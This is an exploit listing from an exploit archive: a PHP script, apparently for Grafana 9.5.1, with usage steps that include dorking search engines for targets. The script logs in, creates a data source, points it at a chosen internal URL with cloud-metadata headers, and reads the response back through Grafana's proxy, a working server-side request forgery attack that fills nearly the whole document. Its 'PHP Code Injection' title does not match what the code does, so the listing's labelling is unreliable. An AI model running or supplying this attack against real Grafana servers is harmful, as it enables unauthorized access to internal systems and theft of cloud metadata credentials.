## https://sploitus.com/exploit?id=PACKETSTORM:189538
=============================================================================================================================================
| # Title : Grafana 9.5.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://grafana.com/grafana/download/9.5.1 |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engines.
[+] Code Description:
It is mainly used as an SSRF (Server-Side Request Forgery) attack against Grafana, an open-source data analytics application used to display charts and monitored data.
[+] Save the code as poc.php.
[+] Set target: lines 225, 226 and 227
[+] Usage: php poc.php
[+] Payload:
<?php
// cURL connection settings
/**
 * Sends a single HTTP request with cURL and returns status code and body.
 *
 * The request is a POST only when $data is truthy (a non-empty body);
 * with a null/empty body cURL's default GET is used. Redirects are
 * followed. Nothing here validates the response.
 *
 * @param string      $url     Absolute URL to request.
 * @param string|null $data    Raw request body, or null/empty for GET.
 * @param string[]    $headers Header lines ("Name: value") for CURLOPT_HTTPHEADER.
 * @param string      $cookies Cookie header string for CURLOPT_COOKIE.
 * @return array{status_code:int, body:string|false} body is false when curl_exec fails.
 */
function send_post_request($url, $data, $headers, $cookies) {
    $options = [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPHEADER     => $headers,
        CURLOPT_COOKIE         => $cookies,
        CURLOPT_FOLLOWLOCATION => true,
        // Peer certificate verification is switched off, so the session
        // cookie and credentials this client sends are exposed to any
        // on-path interception when $url is https.
        CURLOPT_SSL_VERIFYPEER => false,
    ];
    if ($data) {
        $options[CURLOPT_POST]       = true;
        $options[CURLOPT_POSTFIELDS] = $data;
    }

    $handle = curl_init();
    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    $code = curl_getinfo($handle, CURLINFO_HTTP_CODE);
    curl_close($handle);

    return [
        'status_code' => $code,
        'body'        => $body,
    ];
}
// Create a Grafana data source
/**
 * Creates a placeholder Prometheus data source via POST /api/datasources.
 *
 * Returns the "id" field of the JSON reply on HTTP 200; in every other
 * case a diagnostic is echoed and null is returned (callers in this file
 * pass that null on without checking it). $ssrf_url is accepted for
 * signature compatibility but is not used in this function.
 *
 * Defender note: the source is created with the fixed name "SSRF-TESTING";
 * a data source create event carrying that name in Grafana's server log
 * is a direct indicator of this tooling.
 *
 * @param string $sessionid Value of the grafana_session cookie.
 * @param string $ssrf_url  Unused here.
 * @param string $ghost     Grafana base URL without trailing slash.
 * @return mixed Data source id as returned by the API, or null.
 */
function create_source($sessionid, $ssrf_url, $ghost) {
    $payload = json_encode([
        'name'      => 'SSRF-TESTING',
        'type'      => 'prometheus',
        'access'    => 'proxy',
        'isDefault' => false,
    ]);
    $headers = [
        'Origin: ' . $ghost,
        'Accept: application/json, text/plain, */*',
        'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0',
        'Referer: ' . $ghost . '/datasources/new',
        'Connection: close',
        'x-grafana-org-id: 1',
        'content-type: application/json',
        'Accept-Language: en-US,en;q=0.5',
        'Accept-Encoding: gzip, deflate',
    ];

    $reply = send_post_request(
        $ghost . '/api/datasources',
        $payload,
        $headers,
        'grafana_session=' . $sessionid
    );

    if ($reply['status_code'] != 200) {
        echo "Error:\n";
        echo 'Status code: ' . $reply['status_code'] . "\n";
        echo $reply['body'] . "\n";
        return null;
    }

    $decoded = json_decode($reply['body'], true);
    if (!isset($decoded['id'])) {
        echo 'Error: ' . $reply['body'] . "\n";
        return null;
    }

    echo "Source Created\n";
    return $decoded['id'];
}
// Refresh a Grafana data source
/**
 * Reads back /api/datasources/{id} and reports whether it answered HTTP 200.
 *
 * Despite the name this is a plain GET (send_post_request sends GET when
 * the body is null); the data source is not modified. The Referer header
 * hard-codes the id 6 regardless of $id. Nothing is returned.
 *
 * @param string $ghost     Grafana base URL without trailing slash.
 * @param string $sessionid Value of the grafana_session cookie.
 * @param mixed  $id        Data source id from create_source().
 */
function refresh_source($ghost, $sessionid, $id) {
    $headers = [
        'Accept: application/json, text/plain, */*',
        'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0',
        'Referer: ' . $ghost . '/datasources/edit/6/',
        'Connection: close',
        'x-grafana-org-id: 1',
        'Accept-Language: en-US,en;q=0.5',
        'Accept-Encoding: gzip, deflate',
    ];

    $reply = send_post_request(
        $ghost . '/api/datasources/' . $id,
        null,
        $headers,
        'grafana_session=' . $sessionid
    );

    if ($reply['status_code'] == 200) {
        echo "Refreshed Sources\n";
        return;
    }

    echo "Error:\n";
    echo 'Status code: ' . $reply['status_code'] . "\n";
    echo $reply['body'] . "\n";
}
// Create the SSRF in Grafana
/**
 * Re-submits the data source with its "url" pointed at $ssrf_url.
 *
 * POSTs a full data source document to /api/datasources/{id}. The update
 * also sets tlsSkipVerify and two custom request headers
 * (Metadata-Flavor: Google, Metadata: true) that Grafana would attach to
 * proxied requests. Success is reported on HTTP 200 only; the reply body
 * is not inspected. Nothing is returned.
 *
 * Defender note: a data source update whose url points at a non-routable or
 * internal address and whose jsonData carries httpHeaderName values such as
 * "Metadata-Flavor" is the signature of this technique; Grafana's data
 * source update events and outbound egress from the Grafana host are the
 * places to look for it.
 *
 * @param string $sessionid Value of the grafana_session cookie.
 * @param string $ssrf_url  URL the data source will be pointed at.
 * @param string $ghost     Grafana base URL without trailing slash.
 * @param mixed  $id        Data source id from create_source().
 */
function create_ssrf($sessionid, $ssrf_url, $ghost, $id) {
    $document = [
        'id'              => $id,
        'orgId'           => 1,
        'name'            => 'SSRF-TESTING',
        'type'            => 'prometheus',
        'access'          => 'proxy',
        'url'             => $ssrf_url,
        'password'        => 'test',
        'user'            => 'test',
        'database'        => 'test',
        'basicAuth'       => false,
        'withCredentials' => false,
        'isDefault'       => false,
        'jsonData'        => [
            'tlsSkipVerify'   => true,
            'httpHeaderName1' => 'Metadata-Flavor',
            'httpHeaderName2' => 'Metadata',
            'httpMethod'      => 'GET',
        ],
        'secureJsonData'  => [
            'httpHeaderValue1' => 'Google',
            'httpHeaderValue2' => 'true',
        ],
        'version'         => 1,
        'readOnly'        => false,
    ];
    $headers = [
        'Origin: ' . $ghost,
        'Accept: application/json, text/plain, */*',
        'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0',
        'Referer: ' . $ghost . '/datasources/edit/6/',
        'Connection: close',
        'x-grafana-org-id: 1',
        'content-type: application/json',
        'Accept-Language: en-US,en;q=0.5',
        'Accept-Encoding: gzip, deflate',
    ];

    $reply = send_post_request(
        $ghost . '/api/datasources/' . $id,
        json_encode($document),
        $headers,
        'grafana_session=' . $sessionid
    );

    if ($reply['status_code'] == 200) {
        echo "SSRF Source Updated\n";
        return;
    }

    echo "Error:\n";
    echo 'Status code: ' . $reply['status_code'] . "\n";
    echo $reply['body'] . "\n";
}
// Check Grafana SSRF
/**
 * Requests /api/datasources/proxy/{id}/ and records what the proxy returned.
 *
 * Any status other than 502 is treated as a result: the status and body are
 * echoed and appended to "<first-label-of-host>.txt" in the working
 * directory (e.g. "grafana.txt" for a host of grafana.example.org). A 502
 * is treated as failure and only the body is echoed. Nothing is returned.
 *
 * Defender note: this is the step where the server-side request actually
 * happens; the proxy call shows up in Grafana's request log and the
 * outbound connection originates from the Grafana host itself.
 *
 * @param string $sessionid Value of the grafana_session cookie.
 * @param mixed  $id        Data source id from create_source().
 * @param string $ghost     Grafana base URL without trailing slash.
 * @param string $ssrf_url  Target URL, written to the result file for reference.
 */
function check_ssrf($sessionid, $id, $ghost, $ssrf_url) {
    $headers = [
        'Accept: application/json, text/plain, */*',
        'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0',
        'Referer: ' . $ghost . '/datasources/edit/' . $id . '/',
        'Connection: close',
        'x-grafana-org-id: 1',
        'Accept-Language: en-US,en;q=0.5',
        'Accept-Encoding: gzip, deflate',
        // keyed entry in a list: CURLOPT_HTTPHEADER only reads the values,
        // so the bare string "true" is what ends up in the header list
        'x-grafana-nocache' => 'true',
    ];

    $reply = send_post_request(
        $ghost . '/api/datasources/proxy/' . $id . '/',
        null,
        $headers,
        'grafana_session=' . $sessionid
    );

    if ($reply['status_code'] == 502) {
        echo "Error:\n";
        echo $reply['body'] . "\n";
        return;
    }

    echo 'Status code: ' . $reply['status_code'] . "\n";
    echo "Response body:\n" . $reply['body'] . "\n";

    // result file is named after the first DNS label of the Grafana host
    $hostname = parse_url($ghost, PHP_URL_HOST);
    $label    = explode('.', $hostname)[0];
    $record   = 'SSRF URL: ' . $ssrf_url . "\n"
        . 'Status code: ' . $reply['status_code'] . "\n"
        . 'Response body: ' . $reply['body'] . "\n\n";
    file_put_contents($label . '.txt', $record, FILE_APPEND);
}
// Delete a Grafana data source
/**
 * Requests /api/datasources/{id} and expects "Data source deleted" in the body.
 *
 * The request is sent with a null body, i.e. as a GET, so whether the
 * server removes anything is decided entirely by the server; this function
 * only checks the reply text. On any other reply it echoes the body and
 * terminates the script with exit(0). Not called anywhere in this file,
 * which means each run leaves its "SSRF-TESTING" data source in place.
 *
 * @param string $sessionid Value of the grafana_session cookie.
 * @param mixed  $id        Data source id to delete.
 * @param string $ghost     Grafana base URL without trailing slash.
 */
function delete_source($sessionid, $id, $ghost) {
    $headers = [
        'Origin: ' . $ghost,
        'Accept: application/json, text/plain, */*',
        'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0',
        'Referer: ' . $ghost . '/datasources/edit/3/',
        'Connection: close',
        'x-grafana-org-id: 1',
        'Accept-Language: en-US,en;q=0.5',
        'Accept-Encoding: gzip, deflate',
    ];

    $reply = send_post_request(
        $ghost . '/api/datasources/' . $id,
        null,
        $headers,
        'grafana_session=' . $sessionid
    );

    if (strpos($reply['body'], 'Data source deleted') === false) {
        echo "Error:\n";
        echo $reply['body'] . "\n";
        exit(0);
    }

    echo "Deleted Old SSRF Source\n";
}
// Log in to Grafana
/**
 * Posts credentials to /login and returns the session value from the reply.
 *
 * The session is read from the JSON body under "grafana_session", then
 * "grafana_sess" — not from a Set-Cookie header; whether the Grafana build
 * under test returns it in the body is not established by this script.
 * If neither key is present a message is echoed and the script exits.
 *
 * @param string $ghost    Grafana base URL without trailing slash.
 * @param string $username Login name.
 * @param string $password Password, sent in clear text when $ghost is http.
 * @return mixed Session value taken from the JSON reply.
 */
function login($ghost, $username, $password) {
    $payload = json_encode([
        'user'     => $username,
        'password' => $password,
        'email'    => '',
    ]);
    $headers = [
        'Origin: ' . $ghost,
        'Accept: application/json, text/plain, */*',
        'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0',
        'Referer: ' . $ghost . '/signup',
        'Connection: close',
        'content-type: application/json',
        'Accept-Language: en-US,en;q=0.5',
        'Accept-Encoding: gzip, deflate',
    ];

    $reply   = send_post_request($ghost . '/login', $payload, $headers, 'redirect_to=%2F');
    $decoded = json_decode($reply['body'], true);

    // first key present wins, in this order
    foreach (['grafana_session', 'grafana_sess'] as $key) {
        if (isset($decoded[$key])) {
            return $decoded[$key];
        }
    }

    echo "Login Session Cookie not set\n";
    exit(0);
}
// Main execution logic
// ---- configuration: edit these values before running ----
$username = 'username'; // Grafana user name
$password = 'password'; // Grafana password
$ghost    = 'http://example.com'; // Grafana base URL
$ssrf_url = 'http://ssrf-target.com'; // single target URL
$files    = 'ssrf_urls.txt'; // optional file with one target URL per line

/**
 * Runs the create -> read-back -> update -> proxy-check sequence for one
 * target URL. delete_source() is never invoked, so every run leaves a
 * data source named "SSRF-TESTING" on the server.
 *
 * @param mixed  $sessionid Session value from login() (may be undefined, see below).
 * @param string $ghost     Grafana base URL without trailing slash.
 * @param string $target    URL to point the data source at.
 */
function run_target($sessionid, $ghost, $target) {
    $id = create_source($sessionid, $target, $ghost);
    refresh_source($ghost, $sessionid, $id);
    create_ssrf($sessionid, $target, $ghost, $id);
    check_ssrf($sessionid, $id, $ghost, $target);
}

// $sessionid is only assigned when $username is non-empty; otherwise the
// calls below run with an undefined variable and an empty cookie value.
if ($username) {
    $sessionid = login($ghost, $username, $password);
}

if ($ssrf_url) {
    run_target($sessionid, $ghost, $ssrf_url);
}

if ($files && file_exists($files)) {
    foreach (file($files, FILE_IGNORE_NEW_LINES) as $ssrf_url) {
        run_target($sessionid, $ghost, $ssrf_url);
    }
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================